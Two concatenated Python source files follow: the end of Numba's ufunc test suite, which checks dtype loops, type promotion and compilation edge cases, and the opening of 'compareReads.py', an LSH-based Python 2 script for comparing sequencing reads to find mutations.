self.binary_bitwise_op_test('|')
def test_bitwise_xor_array_op(self):
self.binary_bitwise_op_test('^')
def test_equal_array_op(self):
self.binary_op_test('==')
def test_greater_array_op(self):
self.binary_op_test('>')
def test_greater_equal_array_op(self):
self.binary_op_test('>=')
def test_less_array_op(self):
self.binary_op_test('<')
def test_less_equal_array_op(self):
self.binary_op_test('<=')
def test_not_equal_array_op(self):
self.binary_op_test('!=')
class TestScalarUFuncs(TestCase):
"""check the machinery of ufuncs works when the result is an scalar.
These are not exhaustive because:
- the machinery to support this case is the same for all the functions of a
given arity.
- the result of the inner function itself is already tested in TestUFuncs
This class tests regular uses. A subclass tests the no python backend.
"""
_compile_flags = enable_pyobj_flags
def run_ufunc(self, pyfunc, arg_types, arg_values):
for tyargs, args in zip(arg_types, arg_values):
cr = compile_isolated(pyfunc, tyargs, flags=self._compile_flags)
cfunc = cr.entry_point
got = cfunc(*args)
expected = pyfunc(*_as_dtype_value(tyargs, args))
msg = 'for args {0} typed {1}'.format(args, tyargs)
            # Note: due to ufunc casting semantics, things like adding an int32
            # to a uint64 result in a double (neither int32 nor uint64 can be
            # cast safely to the other, so NumPy falls back to the float loop).
            # Adjust the expected value in those cases (the NumPy reference
            # call does not receive typed integers, so its result stays an
            # integer).
special = set([(types.int32, types.uint64), (types.uint64, types.int32),
(types.int64, types.uint64), (types.uint64, types.int64)])
if tyargs in special:
expected = float(expected)
else:
                # The Numba version of scalar ufuncs returns a plain value that
                # gets converted to a Python type, instead of a NumPy scalar.
                # Although in Python 2 NumPy scalars are instances of the
                # appropriate Python type, in Python 3 that is no longer the
                # case. This is why the expected result is cast to the
                # appropriate Python type (which is the intended behavior of
                # the ufunc translation).
if np.issubdtype(expected.dtype, np.inexact):
expected = float(expected)
elif np.issubdtype(expected.dtype, np.integer):
expected = int(expected)
elif np.issubdtype(expected.dtype, np.bool_):
expected = bool(expected)
alltypes = cr.signature.args + (cr.signature.return_type,)
# select the appropriate precision for comparison: note that an argument
# typed at a lower precision can introduce precision problems. For this
# reason the argument types must be taken into account.
if any([t==types.float32 for t in alltypes]):
prec='single'
elif any([t==types.float64 for t in alltypes]):
prec='double'
else:
prec='exact'
self.assertPreciseEqual(got, expected, msg=msg, prec=prec)
def test_scalar_unary_ufunc(self):
def _func(x):
return np.sqrt(x)
vals = [(2,), (2,), (1,), (2,), (.1,), (.2,)]
tys = [(types.int32,), (types.uint32,),
(types.int64,), (types.uint64,),
(types.float32,), (types.float64,)]
self.run_ufunc(_func, tys, vals)
def test_scalar_binary_uniform_ufunc(self):
def _func(x,y):
return np.add(x,y)
vals = [2, 2, 1, 2, .1, .2]
tys = [types.int32, types.uint32,
types.int64, types.uint64, types.float32, types.float64]
self.run_ufunc(_func, zip(tys, tys), zip(vals, vals))
def test_scalar_binary_mixed_ufunc(self, flags=enable_pyobj_flags):
def _func(x,y):
return np.add(x,y)
vals = [2, 2, 1, 2, .1, .2]
tys = [types.int32, types.uint32,
types.int64, types.uint64,
types.float32, types.float64]
self.run_ufunc(_func, itertools.product(tys, tys),
itertools.product(vals, vals))
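# ----------------------------------------------------------------------------
# Illustration only (not part of the test suite): the "special" type pairs
# handled in run_ufunc() above follow NumPy's promotion rule that mixing
# int32/int64 with uint64 has no common integer type, so the result is
# promoted to float64. A minimal sketch with plain NumPy scalars; the helper
# name below is hypothetical.
def _demo_mixed_signed_unsigned_promotion():
    import numpy as np
    result = np.add(np.int64(1), np.uint64(2))
    # Neither int64 nor uint64 can safely represent the other, so NumPy falls
    # back to the floating-point loop and the result dtype is float64.
    assert result.dtype == np.float64
    return result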
class TestScalarUFuncsNoPython(TestScalarUFuncs):
"""Same tests as TestScalarUFuncs, but forcing no python mode"""
_compile_flags = no_pyobj_flags
class TestUfuncIssues(TestCase):
def test_issue_651(self):
# Exercise the code path to make sure this does not fail
@vectorize(["(float64,float64)"])
def foo(x1, x2):
return np.add(x1, x2) + np.add(x1, x2)
a = np.arange(10, dtype='f8')
b = np.arange(10, dtype='f8')
self.assertPreciseEqual(foo(a, b), (a + b) + (a + b))
def test_issue_713(self):
def foo(x,y):
return np.floor_divide(x,y)
cr = compile_isolated(foo, [types.complex128, types.complex128])
self.assertEqual(foo(1j, 1j), cr.entry_point(1j, 1j))
def test_issue_2006(self):
"""
<float32 ** int> should return float32, not float64.
"""
def foo(x, y):
return np.power(x, y)
pyfunc = foo
cfunc = jit(nopython=True)(pyfunc)
def check(x, y):
got = cfunc(x, y)
np.testing.assert_array_almost_equal(got, pyfunc(x, y))
# Check the power operation conserved the input's dtype
# (this is different from Numpy, whose behaviour depends on
# the *values* of the arguments -- see PyArray_CanCastArrayTo).
self.assertEqual(got.dtype, x.dtype)
xs = [np.float32([1, 2, 3]), np.complex64([1j, 2, 3-3j])]
for x in xs:
check(x, 3)
check(x, np.uint64(3))
check(x, np.int64([2, 2, 3]))
class _LoopTypesTester(TestCase):
"""Test code generation for the different loop types defined by ufunc.
This test relies on class variables to configure the test. Subclasses
of this class can just override some of these variables to check other
ufuncs in a different compilation context. The variables supported are:
_funcs: the ufuncs to test
_compile_flags: compilation flags to use (to force nopython mode)
_skip_types: letter types that force skipping the loop when testing
if present in the NumPy ufunc signature.
_supported_types: only test loops where all the types in the loop
signature are in this collection. If unset, all.
Note that both, _skip_types and _supported_types must be met for a loop
to be tested.
The NumPy ufunc signature has a form like 'ff->f' (for a binary ufunc
loop taking 2 floats and resulting in a float). In a NumPy ufunc object
you can get a list of supported signatures by accessing the attribute
'types'.
"""
_skip_types = 'OegG'
# Allowed deviation between Numpy and Numba results
_ulps = {('arccos', 'F'): 2,
('arcsin', 'D'): 4,
('arcsin', 'F'): 4,
('log10', 'D'): 5,
('tanh', 'F'): 2,
}
def _arg_for_type(self, a_letter_type, index=0):
"""return a suitable array argument for testing the letter type"""
# Note all possible arrays must have the same size, since they
# may be used as inputs to the same func.
if a_letter_type in 'bhilq':
# an integral
return np.array([1, 4, 0, -2], dtype=a_letter_type)
if a_letter_type in 'BHILQ':
return np.array([1, 2, 4, 0], dtype=a_letter_type)
elif a_letter_type in '?':
# a boolean
return np.array([True, False, False, True], dtype=a_letter_type)
elif a_letter_type[0] == 'm':
# timedelta64
if len(a_letter_type) == 1:
a_letter_type = 'm8[D]'
return np.array([2, -3, 'NaT', 0], dtype=a_letter_type)
elif a_letter_type[0] == 'M':
# datetime64
if len(a_letter_type) == 1:
a_letter_type = 'M8[D]'
            return np.array(['NaT', 1, 25, 0], dtype=a_letter_type)
elif a_letter_type in 'fd':
# floating point
return np.array([1.5, -3.5, 0.0, float('nan')],
dtype=a_letter_type)
elif a_letter_type in 'FD':
# complex
# Note `-1j` is different on 2.x and 3.x, hence the explicit spelling
if sys.platform != 'win32':
# Other platforms have better handling of negative zeros,
# test them
negzero = -(0.0 + 1.0j)
else:
negzero = 0.0 - 1.0j
return np.array([negzero, 1.5 + 1.5j, 1j * float('nan'), 0j],
dtype=a_letter_type)
else:
raise RuntimeError("type %r not understood" % (a_letter_type,))
def _check_loop(self, fn, ufunc, loop):
# the letter types for the args
letter_types = loop[:ufunc.nin] + loop[-ufunc.nout:]
        # Ignore loops containing an object argument: they will always fail
        # in nopython mode. Usually the last loop of a ufunc is an all-object
        # fallback.
supported_types = getattr(self, '_supported_types', [])
if (supported_types and
any(l not in supported_types for l in letter_types)):
return
skip_types = getattr(self, '_skip_types', [])
if any(l in skip_types for l in letter_types):
return
# if the test case requires some types to be present, skip loops
# not involving any of those types.
required_types = getattr(self, '_required_types', [])
if required_types and not any(l in letter_types
for l in required_types):
return
self._check_ufunc_with_dtypes(fn, ufunc, letter_types)
def _check_ufunc_with_dtypes(self, fn, ufunc, dtypes):
arg_dty = [np.dtype(t) for t in dtypes]
arg_nbty = [types.Array(from_dtype(t), 1, 'C') for t in arg_dty]
cr = compile_isolated(fn, arg_nbty, flags=self._compile_flags)
# Ensure a good mix of input values
c_args = [self._arg_for_type(t, index=index).repeat(2)
for index, t in enumerate(dtypes)]
for arr in c_args:
self.random.shuffle(arr)
py_args = [a.copy() for a in c_args]
cr.entry_point(*c_args)
fn(*py_args)
# Check each array (including inputs, to ensure they weren't
# mutated).
for dtype, py_arg, c_arg in zip(arg_dty, py_args, c_args):
py_arg, c_arg = self._fixup_results(dtype, py_arg, c_arg)
typechar = c_arg.dtype.char
ulps = self._ulps.get((ufunc.__name__, typechar), 1)
prec = 'single' if typechar in 'fF' else 'exact'
prec = 'double' if typechar in 'dD' else prec
msg = '\n'.join(["ufunc '{0}' arrays differ ({1}):",
"args: {2}", "expected {3}", "got {4}"])
            msg = msg.format(ufunc.__name__, prec, c_args, py_arg, c_arg)
self.assertPreciseEqual(py_arg, c_arg, prec=prec, msg=msg,
ulps=ulps)
def _fixup_results(self, dtype, py_arg, c_arg):
return py_arg, c_arg
@classmethod
def _check_ufunc_loops(cls, ufunc):
for loop in ufunc.types:
cls._inject_test(ufunc, loop)
@classmethod
def _inject_test(cls, ufunc, loop):
def test_template(self):
fn = _make_ufunc_usecase(ufunc)
self._check_loop(fn, ufunc, loop)
setattr(cls, "test_{0}_{1}".format(ufunc.__name__,
loop.replace('->', '_')),
test_template)
@classmethod
def autogenerate(cls):
for ufunc in cls._ufuncs:
cls._check_ufunc_loops(ufunc)
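# ----------------------------------------------------------------------------
# Illustration only (not part of the test suite): the loop signatures walked by
# _LoopTypesTester come from the ufunc's `types` attribute, e.g. 'dd->d' for a
# float64 binary loop. A minimal sketch of extracting the letter types the
# tester works with; the helper name is hypothetical.
def _demo_ufunc_loop_signatures():
    import numpy as np
    loops = np.add.types                  # e.g. ['??->?', 'bb->b', ..., 'dd->d', ...]
    loop = loops[0]                       # pick one signature string
    nin, nout = np.add.nin, np.add.nout   # 2 inputs, 1 output for np.add
    letter_types = loop[:nin] + loop[-nout:]
    return loops, letter_types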
class TestLoopTypesIntNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
# reciprocal and power need a special test due to issue #757
_ufuncs.remove(np.power)
_ufuncs.remove(np.reciprocal)
_ufuncs.remove(np.left_shift) # has its own test class
_ufuncs.remove(np.right_shift) # has its own test class
# special test for bool subtract/negative
_ufuncs.remove(np.subtract)
_ufuncs.remove(np.negative)
_required_types = '?bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
TestLoopTypesIntNoPython.autogenerate()
class TestLoopTypesSubtractAndNegativeNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.subtract, np.negative]
_required_types = '?bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types + '?'
TestLoopTypesSubtractAndNegativeNoPython.autogenerate()
class TestLoopTypesReciprocalNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.reciprocal] # issue #757
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
        res = super(TestLoopTypesReciprocalNoPython,
                    self)._arg_for_type(a_letter_type, index=index)
if a_letter_type in 'bBhHiIlLqQ':
# For integer reciprocal, avoid 0 as argument, as it triggers
# undefined behavior that may differ in results from Numba
# to the compiler used to compile NumPy.
res[res == 0] = 42
return res
TestLoopTypesReciprocalNoPython.autogenerate()
class TestLoopTypesPowerNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.power] # issue #757
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
        res = super(TestLoopTypesPowerNoPython,
                    self)._arg_for_type(a_letter_type, index=index)
if a_letter_type in 'bBhHiIlLqQ' and index == 1:
# For integer power, avoid a negative exponent, as it triggers
# undefined behavior that may differ in results from Numba
# to the compiler used to compile NumPy
res[res < 0] = 3
return res
TestLoopTypesPowerNoPython.autogenerate()
class TestLoopTypesIntLeftShiftNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.left_shift]
_required_types = 'bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
        res = super(TestLoopTypesIntLeftShiftNoPython,
                    self)._arg_for_type(a_letter_type, index=index)
# Shifting by a negative amount (argument with index 1) is undefined
# behavior in C. It is also undefined behavior in numba. In the same
# sense, it is also undefined behavior when the shift amount is larger
# than the number of bits in the shifted integer.
# To avoid problems in the test, the values are clamped (clipped) so
# that 0 <= shift_amount < bitcount(shifted_integer)
if index == 1:
bit_count = res.dtype.itemsize * 8
res = np.clip(res, 0, bit_count-1)
return res
TestLoopTypesIntLeftShiftNoPython.autogenerate()
class TestLoopTypesIntRightShiftNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.right_shift]
_required_types = 'bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
        res = super(TestLoopTypesIntRightShiftNoPython,
                    self)._arg_for_type(a_letter_type, index=index)
# Shifting by a negative amount (argument with index 1) is undefined
# behavior in C. It is also undefined behavior in numba. In the same
# sense, it is also undefined behavior when the shift amount is larger
# than the number of bits in the shifted integer.
# To avoid problems in the test, the values are clamped (clipped) so
# that 0 <= shift_amount < bitcount(shifted_integer)
if index == 1:
bit_count = res.dtype.itemsize * 8
res = np.clip(res, 0, bit_count-1)
        # Right shift has "implementation defined behavior" when the number
        # shifted is negative (in C). In Numba, right shift for signed
        # integers is "arithmetic" while for unsigned integers it is
        # "logical". This test compares against the NumPy implementation,
        # which relies on "implementation defined behavior", so the test
        # could report a false failure if the compiler used to compile
        # NumPy doesn't follow the same policy.
        # Hint: do not rely on right shifting negative numbers in NumPy.
if index == 0:
res = np.abs(res)
return res
TestLoopTypesIntRightShiftNoPython.autogenerate()
class TestLoopTypesFloorDivideNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.floor_divide, np.remainder, np.divmod]
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
def _fixup_results(self, dtype, py_arg, c_arg):
if dtype.kind == 'f':
# Discrepancies on floating-point floor division and remainder:
# Numpy may return nan where Numba returns inf, e.g. 1. // 0.
pred = (np.isinf(c_arg) & np.isnan(py_arg))
# Numpy and Numba may differ in signed zeros, e.g. -0. // -1.
pred |= (py_arg == 0.0) & (c_arg == 0.0)
c_arg[pred] = py_arg[pred]
return py_arg, c_arg
TestLoopTypesFloorDivideNoPython.autogenerate()
class TestLoopTypesFloatNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
if iswindows:
_ufuncs.remove(np.signbit) # TODO: fix issue #758
_ufuncs.remove(np.floor_divide) # has its own test class
_ufuncs.remove(np.remainder) # has its own test class
_ufuncs.remove(np.divmod) # has its own test class
_ufuncs.remove(np.mod) # same as np.remainder
_required_types = 'fd'
_skip_types = 'FDmMO' + _LoopTypesTester._skip_types
TestLoopTypesFloatNoPython.autogenerate()
class TestLoopTypesComplexNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
# Test complex types
# Every loop containing a complex argument must be tested
_required_types = 'FD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
TestLoopTypesComplexNoPython.autogenerate()
class TestLoopTypesDatetimeNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
_ufuncs.remove(np.divmod) # not implemented yet
# NOTE: the full list of ufuncs supporting datetime64 and timedelta64
# types in Numpy is:
# ['absolute', 'add', 'divide', 'equal', 'floor_divide', 'fmax', 'fmin',
# 'greater', 'greater_equal', 'less', 'less_equal', 'maximum',
# 'minimum', 'multiply', 'negative', 'not_equal', 'sign', 'subtract',
# 'true_divide']
# Test datetime64 and timedelta64 types.
_required_types = 'mM'
# Test various units combinations (TestLoopTypes is only able to test
# homogeneous units).
def test_add(self):
ufunc = np.add
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[s]'])
# heterogeneous inputs, scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'm8[ms]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[ms]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[m]'])
def test_subtract(self):
ufunc = np.subtract
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[s]'])
# heterogeneous inputs, scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', 'm8[ms]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[ms]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[m]'])
def test_multiply(self):
ufunc = np.multiply
fn = _make_ufunc_usecase(ufunc)
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[us]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['q', 'm8[s]', 'm8[us]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def test_true_divide(self):
ufunc = np.true_divide
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'd'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'd'])
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'q', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'd', 'm8[s]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def test_floor_divide(self):
ufunc = np.floor_divide
fn = _make_ufunc_usecase(ufunc)
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'q', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'd', 'm8[s]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def _check_comparison(self, ufunc):
fn = _make_ufunc_usecase(ufunc)
# timedelta
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', '?'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', '?'])
# datetime
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', '?'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', '?'])
def test_comparisons(self):
for ufunc in [np.equal, np.not_equal, np.less, np.less_equal,
np.greater, np.greater_equal]:
self._check_comparison(ufunc)
TestLoopTypesDatetimeNoPython.autogenerate()
class TestUFuncBadArgsNoPython(TestCase):
_compile_flags = no_pyobj_flags
def test_missing_args(self):
def func(x):
"""error: np.add requires two args"""
result = np.add(x)
return result
self.assertRaises(TypingError, compile_isolated, func, [types.float64],
return_type=types.float64, flags=self._compile_flags)
def test_too_many_args(self):
def func(x, out, out2):
"""error: too many args"""
result = np.add(x, x, out, out2)
return result
array_type = types.Array(types.float64, 1, 'C')
self.assertRaises(TypingError, compile_isolated, func, [array_type] *3,
return_type=array_type, flags=self._compile_flags)
def test_no_scalar_result_by_reference(self):
def func(x):
"""error: scalar as a return value is not supported"""
y = 0
np.add(x, x, y)
self.assertRaises(TypingError, compile_isolated, func, [types.float64],
return_type=types.float64, flags=self._compile_flags)
class TestUFuncCompilationThreadSafety(TestCase):
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #2403).
"""
errors = []
@vectorize
def foo(x):
return x + 1
def wrapper():
try:
                a = np.ones((10,), dtype=np.float64)
                expected = np.ones((10,), dtype=np.float64) + 1.
np.testing.assert_array_equal(foo(a), expected)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
class TestUfuncOnContext(TestCase):
def test_cpu_get_ufunc_info(self):
# The CPU context defines get_ufunc_info that is the same as
# ufunc_db.get_ufunc_info.
targetctx = cpu_target.target_context
# Check: get_ufunc_info returns a dict
add_info = targetctx.get_ufunc_info(np.add)
self.assertIsInstance(add_info, dict)
# Check: it is the same as ufunc_db.get_ufunc_info
expected = ufunc_db.get_ufunc_info(np.add)
self.assertEqual(add_info, expected)
# Check: KeyError raised on bad key
badkey = object()
with self.assertRaises(KeyError) as raises:
ufunc_db.get_ufunc_info(badkey)
self.assertEqual(raises.exception.args, (badkey,))
def test_base_get_ufunc_info(self):
# The BaseContext always raises NotImplementedError
targetctx = BaseContext(cpu_target.typing_context, 'cpu')
with self.assertRaises(NotImplementedError) as raises:
targetctx.get_ufunc_info(np.add)
self.assertRegex(
str(raises.exception),
r"<numba\..*\.BaseContext object at .*> does not support ufunc",
)
if __name__ == '__main__':
unittest.main()
|
compareReads.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Lars Andersen <larsmew@gmail.com>"
__date__ = "19/05/2015"
__version__ = "$Revision: 2.5"
from optparse import OptionParser
from operator import itemgetter
from collections import Counter, deque
from itertools import chain
from multiprocessing import Pool, Queue, Process
import sys, time, os
import random
import copy
import json, csv
import cPickle as pickle
import shelve
import resource
import ntpath
import tarfile
""" global variables """
# LSH
leftPartRatio = 0.5
rightPartRatio = 0.5
printMinhashProcess = 5000000
setVersion = False
# Sequence Alignment
M1 = 1
M2 = 2
secondSample = 0
overlap = 8  # Overlap region in each direction, i.e. a value of 10 gives 20 positions of overlap in total
maxAlignments = 1 # per read
requiredOverlaps = 4
maxCandMates = 5000
MUTFIND = 1
p_id = -1
# Test variables
c1 = 0
c2 = 0
c3 = 0
c4 = 0
c5 = 0
c6 = 0
c7 = 0
c8 = 0
numreadL = 0
numreadR = 0
# ************************************************************************** #
# #
# Helpers #
# #
# ************************************************************************** #
def optionParse():
"""
Parse arguments from command line.
"""
desc = """Compare sets of sequencing data to find mutations."""
parser = OptionParser(usage="usage: %prog --fasta_file filename",
description=desc,
version="%prog version 2.0")
parser.add_option("-f", "--fasta_file",
metavar="<FILENAME>",
default="../Data/Fasta/reads.fa",
action="store",
dest="fasta_file",
help="set <FILENAME> as fasta file.")
parser.add_option("-n", "--normal",
metavar="<FILENAME>",
action="store",
dest="normal_file",
help="set <FILENAME> as normal reads sample.")
parser.add_option("-d", "--diseased",
metavar="<FILENAME>",
action="store",
dest="diseased_file",
help="set <FILENAME> as diseased reads sample.")
parser.add_option("-i", "--candidate_pairs",
metavar="<FILENAME>",
type=str,
action="store",
dest="input",
help="set <FILENAME> as input file containing \
candidate pairs to import.")
parser.add_option("-e", "--export_candidate_pairs",
metavar="<FILENAME>",
type=str,
action="store",
dest="output",
help="set <FILENAME> as output file to export \
candidate pairs to. Dump as either txt, json, \
pickle or csv file. Just put the right extension\
and everything else is automated.")
parser.add_option("-l", "--log_file",
metavar="<FILENAME>",
type=str,
default="log.txt",
action="store",
dest="log",
help="set <FILENAME> as log file.")
parser.add_option("-k", "--k_size",
metavar="<VALUE>",
type=int,
default=12,
action="store",
dest="k",
help="set <VALUE> as size for k-shingles.")
parser.add_option("-t", "--threshold",
metavar="<VALUE>",
type=float,
default=float(2)/3,
action="store",
dest="threshold",
help="set <VALUE> as threshold similarity.")
parser.add_option("-b", "--bands",
metavar="<Value>",
type=int,
default=25,
action="store",
dest="bands",
help="set <VALUE> as the number of bands for LSH.")
parser.add_option("-r", "--rows",
metavar="<Value>",
type=int,
default=40,
action="store",
dest="rows",
help="set <VALUE> as the number of rows for LSH.")
parser.add_option("-x", "--similarity_measure",
metavar="<VALUE>",
type=str,
default="naive",
action="store",
dest="sim",
help="set <VALUE> as similairy measure to use (obsolete).")
parser.add_option("-m", "--minhash_alg",
metavar="<VALUE>",
type=int,
default="6",
action="store",
dest="m",
help="<VALUE> defines the minhash algorithm to use.")
parser.add_option("-s", "--seed",
metavar="<VALUE>",
type=int,
default=42,
action="store",
dest="s",
help="set <VALUE> as seed for hash functions.")
parser.add_option("-T", "--test",
metavar="<VALUE>",
type=int,
action="store",
dest="T",
help="perform test <VALUE>.")
parser.add_option("-S", "--supporting_reads",
metavar="<VALUE>",
type=int,
default=3,
action="store",
dest="S",
help="Reads required to support mutation.")
parser.add_option("-o", "--mismatch_overlap",
metavar="<VALUE>",
type=int,
default=1,
action="store",
dest="o",
help="Number of allowed mismatches in overlap.")
parser.add_option("-g", "--mismatch_group",
metavar="<VALUE>",
type=int,
default=2,
action="store",
dest="g",
help="Number of allowed mismatches in group.")
(options, args) = parser.parse_args()
global requiredOverlaps
requiredOverlaps = options.S
global M1
M1 = options.o
global M2
M2 = options.g
return options.fasta_file, options.normal_file, options.diseased_file,\
options.k, options.threshold, options.bands, options.rows,\
options.m, options.s, options.log, options.input, options.output,\
options.T
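# ---------------------------------------------------------------------------- #
# Not part of the original pipeline: a small, standard LSH sanity check for the
# -b/--bands and -r/--rows options above. With b bands of r rows each, a pair
# with Jaccard similarity s becomes a candidate with probability
# 1 - (1 - s**r)**b, and the banding scheme's similarity threshold is roughly
# (1/b)**(1/r). The function names below are new and hypothetical.
def lshCandidateProbability(s, bands, rows):
    """Probability that a pair of similarity s shares at least one band."""
    return 1.0 - (1.0 - s ** rows) ** bands
def lshApproxThreshold(bands, rows):
    """Approximate similarity threshold of the banding scheme."""
    return (1.0 / bands) ** (1.0 / rows)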
def memory_usage_resource():
"""
Computes the ressource usage (in MB) at a given time during runtime.
Computes total amount used so far, so not the amount currently in use.
"""
rusage_denom = 1024.
if sys.platform == 'darwin':
        # On OS X, ru_maxrss is reported in bytes rather than kilobytes
rusage_denom = rusage_denom * rusage_denom
mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
return mem
def logprint(log_file, flush, *output):
"""
Prints to standard out and to log file
"""
log_output = ""
log_output = " ".join(map(str, output))
print log_output
if log_file:
log_file.write(log_output + "\n")
if flush:
log_file.flush()
def exportCandidatePairs(candidatePairs, output_file, log, numReads=None):
"""
Export candidate pairs to a file.
The type of file is determined on the provided filename for output_file.
Supported filetypes: txt, json, pickle (python) and csv.
"""
tim = time.clock()
# Output file extension
ext = output_file.rsplit(".", 1)
# default to txt if no extension provided
    if len(ext) == 1:
ext = "txt"
output_file += ".txt"
else:
ext = ext[1]
# save set information - However, more space consuming
# and not needed. Hence, this should never be used.
if ext == "set_pickle":
with open(output_file, "w") as f:
pickle.dump(candidatePairs, f)
elif ext == "json":
with open(output_file, "w") as f:
if isinstance(candidatePairs[0], set):
for id1 in candidatePairs:
candidatePairs[id1] = list(candidatePairs[id1])
json.dump(candidatePairs, f)
elif ext == "pickle":
with open(output_file, "w") as f:
if isinstance(candidatePairs[0], set):
for id1 in candidatePairs:
candidatePairs[id1] = list(candidatePairs[id1])
pickle.dump(candidatePairs, f)
elif ext == "txt":
with open(output_file, "w") as f:
for id1 in candidatePairs:
f.write(str(id1)+"\t")
#sortedElements = sorted(list(candidatePairs[id1]))
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
if len(sortedElements) > 0:
f.write(str(sortedElements[-1])+"\n")
# Test-only write the first numReads reads to output file.
elif ext == "temp":
with open(output_file, "w") as f:
for id1 in xrange(numReads):
f.write(str(id1)+"\t")
#sortedElements = sorted(list(candidatePairs[id1]))
#print sortedElements
if id1 in candidatePairs:
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
if len(sortedElements) > 0:
f.write(str(sortedElements[-1]))
f.write("\n")
elif ext == "txt2":
with open(output_file, "w") as f:
for id1 in candidatePairs:
for id2 in candidatePairs[id1]:
f.write(str(id1)+"\t"+str(id2)+"\n")
elif ext == "csv":
w = csv.writer(open(output_file+".csv", "w"))
for key, val in candidatePairs.items():
w.writerow([key, val])
# Else export to whatever filename that is provided in the format
# used for txt files.
else:
output_file += ".txt"
with open(output_file, "w") as f:
for id1 in candidatePairs:
f.write(str(id1)+"\t")
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
f.write(str(sortedElements[-1])+"\n")
logprint(log, False, "Exported candidate pairs to", output_file,
"in", time.clock()-tim, "seconds")
def importCandidatePairs(input_file, log):
"""
Import candidate pairs from a file.
Supported filetypes: txt, json, pickle (python) and csv.
"""
tim = time.clock()
logprint(log, True, "Importing candidate pairs...")
candidatePairs = dict()
# Input file extension
ext = input_file.rsplit(".", 1)
    if len(ext) == 1:
ext = "txt"
input_file += ".txt"
else:
ext = ext[1]
if ext == "set_pickle":
with open(input_file, "r") as f:
candidatePairs = pickle.load(f)
logprint(log, False, "pickle-set:", time.clock()-tim)
elif ext == "json":
with open(input_file, "r") as f:
candidatePairs = json.load(f)
logprint(log, False, "json:", time.clock()-tim)
